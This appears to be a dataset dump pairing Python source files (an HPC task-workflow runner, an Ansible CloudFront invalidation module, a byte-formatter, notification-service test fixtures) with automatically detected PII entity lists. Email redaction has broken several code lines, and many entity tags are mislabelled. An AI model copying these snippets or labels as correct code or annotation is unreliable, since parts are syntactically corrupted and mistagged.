'INNTMP2.ca'], ['URL', 'INNTMP1.co'], ['URL', 'INNTMP2.co'], ['URL', 'INNTMP2.write.sa'], ['URL', 'datetime.no'], ['URL', 'st.st'], ['URL', 'et.st'], ['URL', 'os.sy'], ['URL', 'os.sy'], ['URL', 'os.sy']]" +96,"#!/usr/bin/python +"""""" +Copyright (c) 2014 High-Performance Computing and GIS (HPCGIS) Laboratory. All rights reserved. +Use of this source code is governed by a BSD-style license that can be found in the LICENSE file. +Authors and contributors: Eric Shook (dummy@email.com) +"""""" + +import os +import datetime +import time +import re +import subprocess +from Queue import Queue +#from threading import Thread +import threading +import sys,getopt + +''' +The workflow script accepts a tasklist file, which contains a list of taskfiles. +A task may represent a simulation of an ABM or climate model. Tasks can be run +simultaneously if there are no dependencies or ordered in the case of +dependencies. Tasks may also include pre-processing or post-processing tasks. +''' + +# TODO: Logging may be useful if the workflow becomes long + +# TODO: Currently num_threads is user-defined, which controls the number of threads to launch tasks +# However, it would be better to include in the taskfile the number of cores needed +# and define the number of cores available, enabling the workflow system to manage core allocation + +# Global variables + +# The number of threads used to handle tasks is passed as a parameter +num_threads=0 + +# Array of threads (so they can be killed if needed) +threads=[] + +# Array of task workflow numbers (one per thread/worker) +threadtasknums=[] + +# Task queue +taskqueue=Queue() + +# This function handles executing a task defined by a taskfile +def runtask(taskfile): + + # Read and parse the taskfile with the following format + # Note additional parameters will likely be added based on need (e.g., CWD, data-dir) + ''' + program: /path/to/executable_with_a_name + parameters: param1 -Optionalconfiguration param2 -AnotherParameter + ''' + with open(taskfile,'r') as f: + # Set the required parameters as None for error checking at the end + program=None + parameters=None + for line in f: + if line.startswith(""program:""): + # Extract the entire program location from after the colon split()[1]) with whitespace removed (strip()) + program=line.split("":"",1)[1].strip() + #print ""Program=""+program + + if line.startswith(""parameters:""): + # Extract the parameter string from after the colon split()[1]) with whitespace removed (strip()) + parameters=line.split("":"",1)[1].strip() + #print ""Parameters=""+parameters + + # Error checking for required parameters + if program==None: + raise Exception(""program missing in taskfile"",taskfile) + if parameters==None: + raise Exception(""parameters missing in taskfile"",taskfile) + + print ""Calling program=""+program,parameters + ''' + In future versions that have defined input,output,stdout,etc. + there could be more logic here to: + - run each model in a defined directory + - output stdout,stderr in the directory + - package up output files for easier transfer + - ... + ''' + returncode=subprocess.check_call(program+"" ""+parameters,shell=True) + +# A task worker loops while there are tasks left in the taskqueue +# Input parameter is a thread id (tid) +def taskworker(tid): + while not taskqueue.empty(): + taskfile=taskqueue.get() + + tasknum=taskfile.split(""/"",1)[1].split(""."",1)[0].strip() + tasknum=re.sub(""\D"", """", tasknum) + #print ""tid="",tid + threadtasknums[tid]=int(tasknum) + + # While there is a dependency problem (lower order task numbers are still being processed) + # then spintwait + mintasknum=min(threadtasknums) + while threadtasknums[tid]>mintasknum: + #print ""min="",minthreadtasknum,""min(array)="",min(*threadtasknums),""nums["",i,""]="",threadtasknums[i] + #if(threadtasknums[tid]<=min(*threadtasknums)): # If this task number is less than or equal to the minimum + # break # then there are no dependencies, so you can break out of this infinite loop + time.sleep(1) # this is a spin-wait loop + mintasknum=min(*threadtasknums) + + print ""Thread"",tid,""running"",taskfile,""at"",str(datetime.datetime.now()) + try: + runtask(taskfile) + except: + exit(1) + taskqueue.task_done() + threadtasknums[tid]=999999 # Set the tasknum for tid to 9999 so it doesn't influence dependencies + print ""Thread"",tid,""quitting, because taskqueue is empty"" + +# Main program code +def main(): + print ""Starting node workflow"" + + try: + opts,args=getopt.getopt(sys.argv[1:],""n:t:"",[""numthreads="",""tasklist=""]) + except getopt.GetoptError: + print ""workflow.py -n -t "" + sys.exit(1) + + # Set model filename and experiment name based on command-line parameter + num_threads=0 + tasklistfile="""" + for opt, arg in opts: + if opt in (""-n"", ""--numthreads""): + num_threads=int(arg) + if opt in (""-t"", ""--tasklist""): + tasklistfile=arg + err=0 + if num_threads<=0: + print "" [ ERROR ] Number of threads must be greater than 0"" + err=1 + if tasklistfile=="""": + print "" [ ERROR ] Must provide tasklistfile"" + err=1 + if err==1: + print ""workflow.py -n -t "" + sys.exit(1) + + print ""Executing in current directory :"",os.getcwd() + + print ""Reading tasklist file"" + with open(tasklistfile,'r') as f: + taskfiles = f.readlines() + f.close() + + +# tasksdir = 'tasks/' +# taskfiles = os.listdir(tasksdir) # Contains a list of task files to process + taskfiles.sort() + + print ""Starting task queue"" + for taskfile in taskfiles: + taskqueue.put(taskfile.strip()) + print ""Task queue contains "",taskqueue.qsize(),"" tasks"" + + # Start the workflow engine + # Currently the logic is simple -> one task==one thread==one core but that will need + # to be modified to account for multithreaded models (agent-based and climate) + # so eventually this will need to parse the task to determine the number of cores + # needed by the task and dynamically manage the number of tasks running simultaneously + print ""Starting "",num_threads,"" threads"" + for i in range(num_threads): + threadtasknums.append(-1) + t=threading.Thread(target=taskworker,args=(i,)) + t.daemon=True + t.setDaemon(True) + t.start() + threads.append(t) + + # Now we wait until all of the tasks are finished. + print ""Waiting for threads to finish"" + + # Normally you can use a blocking .join, but then you cannot kill the process + # So instead we spin-wait and catch ^C so a user can kill this process. +# while threading.activeCount() > 0: +# time.sleep(20) + while taskqueue.qsize()>0: + time.sleep(1) + print ""taskqueue size"",taskqueue.qsize() + ''' # FIXME: Need to clean up this code, which was used for testing ^C + try: + time.sleep(5) # Wait 5 seconds before checking again + # FIXME: In production this should be changed to 30 + # If Ctrl+C or other error, kill all of the threads + except: + while not taskqueue.empty(): # Empty the queue + taskqueue.get() + for i in threads: + i.kill_received=True + i.kill() + exit(1) + ''' + + print ""Joining taskqueue"" + # At this point all of the tasks should be finished so we join them + notfinished=1 + while notfinished==1: + notfinished=0 + for i in range(num_threads): + if threadtasknums[i]<999999: + notfinished=1 + time.sleep(1) + #while not taskqueue.join(1): + # time.sleep(1) + print ""Finished node workflow"" + +# Run main +if __name__==""__main__"": + main() + +",7938,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014'], ['PERSON', 'Eric Shook'], ['PERSON', ""getopt\n\n'""], ['PERSON', 'TODO'], ['PERSON', 'tasknum=taskfile.split(""/"",1)[1].split(""'], ['PERSON', 'tasknum=re.sub(""\\D'], ['PERSON', 'tasknum'], ['PERSON', 'mintasknum=min(threadtasknums'], ['PERSON', 'tasksdir'], ['LOCATION', '.join'], ['DATE_TIME', '5 seconds'], ['URL', 'email.com'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'subprocess.ch'], ['URL', 'taskqueue.ge'], ['URL', 're.su'], ['URL', 'time.sl'], ['URL', 'datetime.datetime.no'], ['URL', 'getopt.ge'], ['URL', 'sys.ar'], ['URL', 'getopt.Ge'], ['URL', 'workflow.py'], ['URL', 'workflow.py'], ['URL', 'os.ge'], ['URL', 'f.re'], ['URL', 'f.cl'], ['URL', 'os.li'], ['URL', 'taskfiles.so'], ['URL', 'taskfile.st'], ['URL', 'threading.Th'], ['URL', 't.se'], ['URL', 't.st'], ['URL', 'threading.ac'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'time.sl'], ['URL', 'taskqueue.ge'], ['URL', 'i.ki'], ['URL', 'i.ki'], ['URL', 'time.sl'], ['URL', 'taskqueue.jo'], ['URL', 'time.sl']]" +97,"#!/usr/bin/python +# Copyright (c) 2017 Ansible Project +# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) + +from __future__ import (absolute_import, division, print_function) +__metaclass__ = type + +ANSIBLE_METADATA = {'metadata_version': '1.1', + 'status': ['preview'], + 'supported_by': 'community'} + +DOCUMENTATION = ''' +--- + +module: cloudfront_invalidation + +short_description: create invalidations for AWS CloudFront distributions +description: + - Allows for invalidation of a batch of paths for a CloudFront distribution. + +requirements: + - boto3 >= 1.0.0 + - python >= 2.6 + +version_added: ""2.5"" + +author: Willem van Ketwich (@wilvk) + +extends_documentation_fragment: + - aws + - ec2 + +options: + distribution_id: + description: + - The ID of the CloudFront distribution to invalidate paths for. Can be specified instead of the alias. + required: false + type: str + alias: + description: + - The alias of the CloudFront distribution to invalidate paths for. Can be specified instead of distribution_id. + required: false + type: str + caller_reference: + description: + - A unique reference identifier for the invalidation paths. + - Defaults to current datetime stamp. + required: false + default: + type: str + target_paths: + description: + - A list of paths on the distribution to invalidate. Each path should begin with '/'. Wildcards are allowed. eg. '/foo/bar/*' + required: true + type: list + elements: str + +notes: + - does not support check mode + +''' + +EXAMPLES = ''' + +- name: create a batch of invalidations using a distribution_id for a reference + cloudfront_invalidation: + distribution_id: E15BU8SDCGSG57 + caller_reference: testing 123 + target_paths: + - /testpathone/test1.css + - /testpathtwo/test2.js + - /testpaththree/test3.ss + +- name: create a batch of invalidations using an alias as a reference and one path using a wildcard match + cloudfront_invalidation: + alias: alias.test.com + caller_reference: testing 123 + target_paths: + - /testpathone/test4.css + - /testpathtwo/test5.js + - /testpaththree/* + +''' + +RETURN = ''' +invalidation: + description: The invalidation's information. + returned: always + type: complex + contains: + create_time: + description: The date and time the invalidation request was first made. + returned: always + type: str + sample: '2018-02-01T15:50:41.159000+00:00' + id: + description: The identifier for the invalidation request. + returned: always + type: str + sample: I2G9MOWJZFV612 + invalidation_batch: + description: The current invalidation information for the batch request. + returned: always + type: complex + contains: + caller_reference: + description: The value used to uniquely identify an invalidation request. + returned: always + type: str + sample: testing 123 + paths: + description: A dict that contains information about the objects that you want to invalidate. + returned: always + type: complex + contains: + items: + description: A list of the paths that you want to invalidate. + returned: always + type: list + sample: + - /testpathtwo/test2.js + - /testpathone/test1.css + - /testpaththree/test3.ss + quantity: + description: The number of objects that you want to invalidate. + returned: always + type: int + sample: 3 + status: + description: The status of the invalidation request. + returned: always + type: str + sample: Completed +location: + description: The fully qualified URI of the distribution and invalidation batch request. + returned: always + type: str + sample: https://cloudfront.amazonaws.PI:KEY +''' + +from ansible.module_utils.ec2 import get_aws_connection_info +from ansible.module_utils.ec2 import ec2_argument_spec, boto3_conn +from ansible.module_utils.ec2 import snake_dict_to_camel_dict +from ansible.module_utils.ec2 import camel_dict_to_snake_dict +from ansible.module_utils.aws.core import AnsibleAWSModule +from ansible.module_utils.aws.cloudfront_facts import CloudFrontFactsServiceManager +import datetime + +try: + from botocore.exceptions import ClientError, BotoCoreError +except ImportError: + pass # caught by imported AnsibleAWSModule + + +class CloudFrontInvalidationServiceManager(object): + """""" + Handles CloudFront service calls to AWS for invalidations + """""" + + def __init__(self, module): + self.module = module + self.create_client('cloudfront') + + def create_client(self, resource): + region, ec2_url, aws_connect_kwargs = get_aws_connection_info(self.module, boto3=True) + self.client = boto3_conn(self.module, conn_type='client', resource=resource, region=region, endpoint=ec2_url, **aws_connect_kwargs) + + def create_invalidation(self, distribution_id, invalidation_batch): + current_invalidation_response = self.get_invalidation(distribution_id, invalidation_batch['CallerReference']) + try: + response = self.client.create_invalidation(DistributionId=distribution_id, InvalidationBatch=invalidation_batch) + response.pop('ResponseMetadata', None) + if current_invalidation_response: + return response, False + else: + return response, True + except BotoCoreError as e: + self.module.fail_json_aws(e, msg=""Error creating CloudFront invalidations."") + except ClientError as e: + if ('Your request contains a caller reference that was used for a previous invalidation batch ' + 'for the same distribution.' in e.response['Error']['Message']): + self.module.warn(""InvalidationBatch target paths are not modifiable. "" + ""To make a new invalidation please update caller_reference."") + return current_invalidation_response, False + else: + self.module.fail_json_aws(e, msg=""Error creating CloudFront invalidations."") + + def get_invalidation(self, distribution_id, caller_reference): + current_invalidation = {} + # find all invalidations for the distribution + try: + paginator = self.client.get_paginator('list_invalidations') + invalidations = paginator.paginate(DistributionId=distribution_id).build_full_result().get('InvalidationList', {}).get('Items', []) + invalidation_ids = [inv['Id'] for inv in invalidations] + except (BotoCoreError, ClientError) as e: + self.module.fail_json_aws(e, msg=""Error listing CloudFront invalidations."") + + # check if there is an invalidation with the same caller reference + for inv_id in invalidation_ids: + try: + invalidation = self.client.get_invalidation(DistributionId=distribution_id, Id=inv_id)['Invalidation'] + caller_ref = invalidation.get('InvalidationBatch', {}).get('CallerReference') + except (BotoCoreError, ClientError) as e: + self.module.fail_json_aws(e, msg=""Error getting CloudFront invalidation {0}"".format(inv_id)) + if caller_ref == caller_reference: + current_invalidation = invalidation + break + + current_invalidation.pop('ResponseMetadata', None) + return current_invalidation + + +class CloudFrontInvalidationValidationManager(object): + """""" + Manages CloudFront validations for invalidation batches + """""" + + def __init__(self, module): + self.module = module + self.__cloudfront_facts_mgr = CloudFrontFactsServiceManager(module) + + def validate_distribution_id(self, distribution_id, alias): + try: + if distribution_id is None and alias is None: + self.module.fail_json(msg=""distribution_id or alias must be specified"") + if distribution_id is None: + distribution_id = self.__cloudfront_facts_mgr.get_distribution_id_from_domain_name(alias) + return distribution_id + except (ClientError, BotoCoreError) as e: + self.module.fail_json_aws(e, msg=""Error validating parameters."") + + def create_aws_list(self, invalidation_batch): + aws_list = {} + aws_list[""Quantity""] = len(invalidation_batch) + aws_list[""Items""] = invalidation_batch + return aws_list + + def validate_invalidation_batch(self, invalidation_batch, caller_reference): + try: + if caller_reference is not None: + valid_caller_reference = caller_reference + else: + valid_caller_reference = datetime.datetime.now().isoformat() + valid_invalidation_batch = { + 'paths': self.create_aws_list(invalidation_batch), + 'caller_reference': valid_caller_reference + } + return valid_invalidation_batch + except (ClientError, BotoCoreError) as e: + self.module.fail_json_aws(e, msg=""Error validating invalidation batch."") + + +def main(): + argument_spec = ec2_argument_spec() + + argument_spec.update(dict( + caller_reference=dict(), + distribution_id=dict(), + alias=dict(), + target_paths=dict(required=True, type='list') + )) + + module = AnsibleAWSModule(argument_spec=argument_spec, supports_check_mode=False, mutually_exclusive=[['distribution_id', 'alias']]) + + validation_mgr = CloudFrontInvalidationValidationManager(module) + service_mgr = CloudFrontInvalidationServiceManager(module) + + caller_reference = module.params.get('caller_reference') + distribution_id = module.params.get('distribution_id') + alias = module.params.get('alias') + target_paths = module.params.get('target_paths') + + result = {} + + distribution_id = validation_mgr.validate_distribution_id(distribution_id, alias) + valid_target_paths = validation_mgr.validate_invalidation_batch(target_paths, caller_reference) + valid_pascal_target_paths = snake_dict_to_camel_dict(valid_target_paths, True) + result, changed = service_mgr.create_invalidation(distribution_id, valid_pascal_target_paths) + + module.exit_json(changed=changed, **camel_dict_to_snake_dict(result)) + + +if __name__ == '__main__': + main() +",10484,"[['DATE_TIME', '2017'], ['PERSON', 'Willem van Ketwich'], ['DATE_TIME', '2018-02-01T15:50:41.159000+'], ['DATE_TIME', ""00:00'\n i""], ['PERSON', 'aws_connect_kwargs = get_aws_connection_info(self.module'], ['URL', 'self.mo'], ['LOCATION', 'BotoCoreError'], ['LOCATION', 'BotoCoreError'], ['PERSON', ""caller_reference = module.params.get('caller_reference'""], ['LOCATION', 'validation_mgr.validate_invalidation_batch(target_paths'], ['URL', 'https://www.gnu.org/licenses/gpl-3.0.txt'], ['URL', 'https://cloudfront.am'], ['URL', 'alias.test.com'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.ec'], ['URL', 'ansible.mo'], ['URL', 'utils.aws.co'], ['URL', 'ansible.mo'], ['URL', 'utils.aws.cl'], ['URL', 'self.mo'], ['URL', 'self.cr'], ['URL', 'self.cl'], ['URL', 'self.mo'], ['URL', 'self.ge'], ['URL', 'self.client.cr'], ['URL', 'self.mo'], ['URL', 'e.re'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'self.client.ge'], ['URL', 'paginator.pa'], ['URL', 'self.mo'], ['URL', 'self.client.ge'], ['URL', 'invalidation.ge'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'mgr.ge'], ['URL', 'self.mo'], ['URL', 'datetime.datetime.no'], ['URL', 'self.cr'], ['URL', 'self.mo'], ['URL', 'module.params.ge'], ['URL', 'module.params.ge'], ['URL', 'module.params.ge'], ['URL', 'module.params.ge'], ['URL', 'mgr.va'], ['URL', 'mgr.va'], ['URL', 'mgr.cr']]" +98,"#!/usr/bin/env python +# -*- coding: utf-8 -*- + +# Copyright (C) 2006 José de Paula Eufrásio Junior (dummy@email.com) AND +# Yves Junqueira (dummy@email.com) +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation; either version 2 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA + +# from http://www.voidspace.org.uk/python/pathutils.html (BSD License) + +def formatbytes(sizeint, configdict=None, **configs): + """""" + Given a file size as an integer, return a nicely formatted string that + represents the size. Has various options to control it's output. + + You can pass in a dictionary of arguments or keyword arguments. Keyword + arguments override the dictionary and there are sensible defaults for options + you don't set. + + Options and defaults are as follows : + + * ``forcekb = False`` - If set this forces the output to be in terms + of kilobytes and bytes only. + + * ``largestonly = True`` - If set, instead of outputting + ``1 Mbytes, 307 Kbytes, 478 bytes`` it outputs using only the largest + denominator - e.g. ``1.3 Mbytes`` or ``17.2 Kbytes`` + + * ``kiloname = 'Kbytes'`` - The string to use for kilobytes + + * ``meganame = 'Mbytes'`` - The string to use for Megabytes + + * ``bytename = 'bytes'`` - The string to use for bytes + + * ``nospace = True`` - If set it outputs ``1Mbytes, 307Kbytes``, + notice there is no space. + + Example outputs : :: + + 19Mbytes, 75Kbytes, 255bytes + 2Kbytes, 0bytes + 23.8Mbytes + + .. note:: + + It currently uses the plural form even for singular. + """""" + defaultconfigs = { 'forcekb' : False, + 'largestonly' : True, + 'kiloname' : 'Kbytes', + 'meganame' : 'Mbytes', + 'bytename' : 'bytes', + 'nospace' : True} + if configdict is None: + configdict = {} + for entry in configs: + # keyword parameters override the dictionary passed in + configdict[entry] = configs[entry] + # + for keyword in defaultconfigs: + if not configdict.has_key(keyword): + configdict[keyword] = defaultconfigs[keyword] + # + if configdict['nospace']: + space = '' + else: + space = ' ' + # + mb, kb, rb = bytedivider(sizeint) + if configdict['largestonly']: + if mb and not configdict['forcekb']: + return stringround(mb, kb)+ space + configdict['meganame'] + elif kb or configdict['forcekb']: + if mb and configdict['forcekb']: + kb += 1024*mb + return stringround(kb, rb) + space+ configdict['kiloname'] + else: + return str(rb) + space + configdict['bytename'] + else: + outstr = '' + if mb and not configdict['forcekb']: + outstr = str(mb) + space + configdict['meganame'] +', ' + if kb or configdict['forcekb'] or mb: + if configdict['forcekb']: + kb += 1024*mb + outstr += str(kb) + space + configdict['kiloname'] +', ' + return outstr + str(rb) + space + configdict['bytename'] + + +",3822,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2006'], ['PERSON', 'José de Paula Eufrásio Junior'], ['PERSON', 'Yves Junqueira'], ['PERSON', 'Franklin St'], ['LOCATION', 'Boston'], ['LOCATION', 'USA'], ['PERSON', 'Mbytes'], ['PERSON', 'largestonly'], ['PERSON', 'meganame'], ['PERSON', 'Mbytes'], ['LOCATION', 'stringround(mb'], ['URL', 'http://www.voidspace.org.uk/python/pathutils.html'], ['IP_ADDRESS', '\n \n '], ['IP_ADDRESS', 'e::\n \n '], ['URL', 'email.com'], ['URL', 'email.com']]" +99,"import random +import uuid +from datetime import date, datetime, timedelta + +import pytest + +from app import db +from app.dao import fact_processing_time_dao +from app.dao.email_branding_dao import dao_create_email_branding +from app.dao.inbound_sms_dao import dao_create_inbound_sms +from app.dao.invited_org_user_dao import save_invited_org_user +from app.dao.invited_user_dao import save_invited_user +from app.dao.jobs_dao import dao_create_job +from app.dao.notifications_dao import dao_create_notification +from app.dao.organisation_dao import ( + dao_add_service_to_organisation, + dao_create_organisation, +) +from app.dao.permissions_dao import permission_dao +from app.dao.service_callback_api_dao import save_service_callback_api +from app.dao.service_data_retention_dao import insert_service_data_retention +from app.dao.service_inbound_api_dao import save_service_inbound_api +from app.dao.service_permissions_dao import dao_add_service_permission +from app.dao.service_sms_sender_dao import ( + dao_update_service_sms_sender, + update_existing_sms_sender_with_inbound_number, +) +from app.dao.services_dao import dao_add_user_to_service, dao_create_service +from app.dao.templates_dao import dao_create_template, dao_update_template +from app.dao.users_dao import save_model_user +from app.models import ( + EMAIL_TYPE, + KEY_TYPE_NORMAL, + LETTER_TYPE, + MOBILE_TYPE, + SMS_TYPE, + AnnualBilling, + ApiKey, + BroadcastEvent, + BroadcastMessage, + BroadcastProvider, + BroadcastProviderMessage, + BroadcastProviderMessageNumber, + BroadcastStatusType, + Complaint, + DailySortedLetter, + Domain, + EmailBranding, + FactBilling, + FactNotificationStatus, + FactProcessingTime, + InboundNumber, + InboundSms, + InvitedOrganisationUser, + InvitedUser, + Job, + LetterBranding, + LetterRate, + Notification, + NotificationHistory, + Organisation, + Permission, + Rate, + ReturnedLetter, + Service, + ServiceCallbackApi, + ServiceContactList, + ServiceEmailReplyTo, + ServiceGuestList, + ServiceInboundApi, + ServiceLetterContact, + ServicePermission, + ServiceSmsSender, + Template, + TemplateFolder, + User, + WebauthnCredential, +) + + +def create_user( + *, + mobile_number=""+447700900986"", + dummy@email.com"", + state='active', + id_=None, + name=""Test User"" +): + data = { + 'id': id_ or uuid.uuid4(), + 'name': name, + 'email_address': email, + 'password': 'password', + 'mobile_number': mobile_number, + 'state': state + } + user = User.query.filter_by(email_address=email).first() + if not user: + user = User(**data) + save_model_user(user, validated_email_access=True) + return user + + +def create_permissions(user, service, *permissions): + permissions = [ + Permission(service_id=service.id, user_id=user.id, permission=p) + for p in permissions + ] + + permission_dao.set_user_service_permission(user, service, permissions, _commit=True) + + +def create_service( + user=None, + service_name=""Sample service"", + service_id=None, + restricted=False, + count_as_live=True, + service_permissions=None, + research_mode=False, + active=True, + email_from=None, + prefix_sms=True, + message_limit=1000, + organisation_type='central', + check_if_service_exists=False, + go_live_user=None, + go_live_at=None, + crown=True, + organisation=None, + purchase_order_number=None, + billing_contact_names=None, + billing_contact_email_addresses=None, + billing_reference=None, +): + if check_if_service_exists: + service = Service.query.filter_by(name=service_name).first() + if (not check_if_service_exists) or (check_if_service_exists and not service): + service = Service( + name=service_name, + message_limit=message_limit, + restricted=restricted, + email_from=email_from if email_from else service_name.lower().replace(' ', '.'), + created_by=user if user else create_user(dummy@email.com())), + prefix_sms=prefix_sms, + organisation_type=organisation_type, + organisation=organisation, + go_live_user=go_live_user, + go_live_at=go_live_at, + crown=crown, + purchase_order_number=purchase_order_number, + billing_contact_names=billing_contact_names, + billing_contact_email_addresses=billing_contact_email_addresses, + billing_reference=billing_reference, + ) + dao_create_service( + service, + service.created_by, + service_id, + service_permissions=service_permissions, + ) + + service.active = active + service.research_mode = research_mode + service.count_as_live = count_as_live + else: + if user and user not in service.users: + dao_add_user_to_service(service, user) + + return service + + +def create_service_with_inbound_number( + inbound_number='1234567', + *args, **kwargs +): + service = create_service(*args, **kwargs) + + sms_sender = ServiceSmsSender.query.filter_by(service_id=service.id).first() + inbound = create_inbound_number(number=inbound_number, service_id=service.id) + update_existing_sms_sender_with_inbound_number(service_sms_sender=sms_sender, + sms_sender=inbound_number, + inbound_number_id=inbound.id) + + return service + + +def create_service_with_defined_sms_sender( + sms_sender_value='1234567', + *args, **kwargs +): + service = create_service(*args, **kwargs) + + sms_sender = ServiceSmsSender.query.filter_by(service_id=service.id).first() + dao_update_service_sms_sender(service_id=service.id, + service_sms_sender_id=sms_sender.id, + is_default=True, + sms_sender=sms_sender_value) + + return service + + +def create_template( + service, + template_type=SMS_TYPE, + template_name=None, + subject='Template subject', + content='Dear Sir/Madam, Hello. Yours Truly, The Government.', + reply_to=None, + hidden=False, + archived=False, + folder=None, + postage=None, + process_type='normal', + contact_block_id=None +): + data = { + 'name': template_name or '{} Template Name'.format(template_type), + 'template_type': template_type, + 'content': content, + 'service': service, + 'created_by': service.created_by, + 'reply_to': reply_to, + 'hidden': hidden, + 'folder': folder, + 'process_type': process_type, + } + if template_type == LETTER_TYPE: + data[""postage""] = postage or ""second"" + if contact_block_id: + data['service_letter_contact_id'] = contact_block_id + if template_type != SMS_TYPE: + data['subject'] = subject + template = Template(**data) + dao_create_template(template) + + if archived: + template.archived = archived + dao_update_template(template) + + return template + + +def create_notification( + template=None, + job=None, + job_row_number=None, + to_field=None, + status='created', + reference=None, + created_at=None, + sent_at=None, + updated_at=None, + billable_units=1, + personalisation=None, + api_key=None, + key_type=KEY_TYPE_NORMAL, + sent_by=None, + client_reference=None, + rate_multiplier=None, + international=False, + phone_prefix=None, + scheduled_for=None, + normalised_to=None, + one_off=False, + reply_to_text=None, + created_by_id=None, + postage=None, + document_download_count=None, +): + assert job or template + if job: + template = job.template + + if created_at is None: + created_at = datetime.utcnow() + + if to_field is None: + to_field = '+447700900855' if template.template_type == SMS_TYPE else dummy@email.com' + + if status not in ('created', 'validation-failed', 'virus-scan-failed', 'pending-virus-check'): + sent_at = sent_at or datetime.utcnow() + updated_at = updated_at or datetime.utcnow() + + if not one_off and (job is None and api_key is None): + # we did not specify in test - lets create it + api_key = ApiKey.query.filter(ApiKey.service == template.service, ApiKey.key_type == key_type).first() + if not api_key: + api_key = create_api_key(template.service, key_type=key_type) + + if template.template_type == 'letter' and postage is None: + postage = 'second' + + data = { + 'id': uuid.uuid4(), + 'to': to_field, + 'job_id': job and job.id, + 'job': job, + 'service_id': template.service.id, + 'service': template.service, + 'template_id': template.id, + 'template_version': template.version, + 'status': status, + 'reference': reference, + 'created_at': created_at, + 'sent_at': sent_at, + 'billable_units': billable_units, + 'personalisation': personalisation, + 'notification_type': template.template_type, + 'api_key': api_key, + 'api_key_id': api_key and api_key.id, + 'key_type': api_key.key_type if api_key else key_type, + 'sent_by': sent_by, + 'updated_at': updated_at, + 'client_reference': client_reference, + 'job_row_number': job_row_number, + 'rate_multiplier': rate_multiplier, + 'international': international, + 'phone_prefix': phone_prefix, + 'normalised_to': normalised_to, + 'reply_to_text': reply_to_text, + 'created_by_id': created_by_id, + 'postage': postage, + 'document_download_count': document_download_count, + } + notification = Notification(**data) + dao_create_notification(notification) + + return notification + + +def create_notification_history( + template=None, + job=None, + job_row_number=None, + status='created', + reference=None, + created_at=None, + sent_at=None, + updated_at=None, + billable_units=1, + api_key=None, + key_type=KEY_TYPE_NORMAL, + sent_by=None, + client_reference=None, + rate_multiplier=None, + international=False, + phone_prefix=None, + created_by_id=None, + postage=None, + id=None +): + assert job or template + if job: + template = job.template + + if created_at is None: + created_at = datetime.utcnow() + + if status != 'created': + sent_at = sent_at or datetime.utcnow() + updated_at = updated_at or datetime.utcnow() + + if template.template_type == 'letter' and postage is None: + postage = 'second' + + data = { + 'id': id or uuid.uuid4(), + 'job_id': job and job.id, + 'job': job, + 'service_id': template.service.id, + 'service': template.service, + 'template_id': template.id, + 'template_version': template.version, + 'status': status, + 'reference': reference, + 'created_at': created_at, + 'sent_at': sent_at, + 'billable_units': billable_units, + 'notification_type': template.template_type, + 'api_key': api_key, + 'api_key_id': api_key and api_key.id, + 'key_type': api_key.key_type if api_key else key_type, + 'sent_by': sent_by, + 'updated_at': updated_at, + 'client_reference': client_reference, + 'job_row_number': job_row_number, + 'rate_multiplier': rate_multiplier, + 'international': international, + 'phone_prefix': phone_prefix, + 'created_by_id': created_by_id, + 'postage': postage + } + notification_history = NotificationHistory(**data) + db.session.add(notification_history) + db.session.commit() + + return notification_history + + +def create_job( + template, + notification_count=1, + created_at=None, + job_status='pending', + scheduled_for=None, + processing_started=None, + processing_finished=None, + original_file_name='some.csv', + archived=False, + contact_list_id=None, +): + data = { + 'id': uuid.uuid4(), + 'service_id': template.service_id, + 'service': template.service, + 'template_id': template.id, + 'template_version': template.version, + 'original_file_name': original_file_name, + 'notification_count': notification_count, + 'created_at': created_at or datetime.utcnow(), + 'created_by': template.created_by, + 'job_status': job_status, + 'scheduled_for': scheduled_for, + 'processing_started': processing_started, + 'processing_finished': processing_finished, + 'archived': archived, + 'contact_list_id': contact_list_id, + } + job = Job(**data) + dao_create_job(job) + return job + + +def create_service_permission(service_id, permission=EMAIL_TYPE): + dao_add_service_permission( + service_id if service_id else create_service().id, permission) + + service_permissions = ServicePermission.query.all() + + return service_permissions + + +def create_inbound_sms( + service, + notify_number=None, + user_number='447700900111', + provider_date=None, + provider_reference=None, + content='Hello', + provider=""mmg"", + created_at=None +): + if not service.inbound_number: + create_inbound_number( + # create random inbound number + notify_number or '07{:09}'.format(random.randint(0, 1e9 - 1)), + provider=provider, + service_id=service.id + ) + + inbound = InboundSms( + service=service, + created_at=created_at or datetime.utcnow(), + notify_number=service.get_inbound_number(), + user_number=user_number, + provider_date=provider_date or datetime.utcnow(), + provider_reference=provider_reference or 'foo', + content=content, + provider=provider + ) + dao_create_inbound_sms(inbound) + return inbound + + +def create_service_inbound_api( + service, + url=""https://something.com"", + bearer_token=""some_super_secret"", +): + service_inbound_api = ServiceInboundApi(service_id=service.id, + url=url, + bearer_token=bearer_token, + updated_by_id=service.users[0].id + ) + save_service_inbound_api(service_inbound_api) + return service_inbound_api + + +def create_service_callback_api( + service, + url=""https://something.com"", + bearer_token=""some_super_secret"", + callback_type=""delivery_status"" +): + service_callback_api = ServiceCallbackApi(service_id=service.id, + url=url, + bearer_token=bearer_token, + updated_by_id=service.users[0].id, + callback_type=callback_type + ) + save_service_callback_api(service_callback_api) + return service_callback_api + + +def create_email_branding(colour='blue', logo='test_x2.png', name='test_org_1', text='DisplayName'): + data = { + 'colour': colour, + 'logo': logo, + 'name': name, + 'text': text, + } + email_branding = 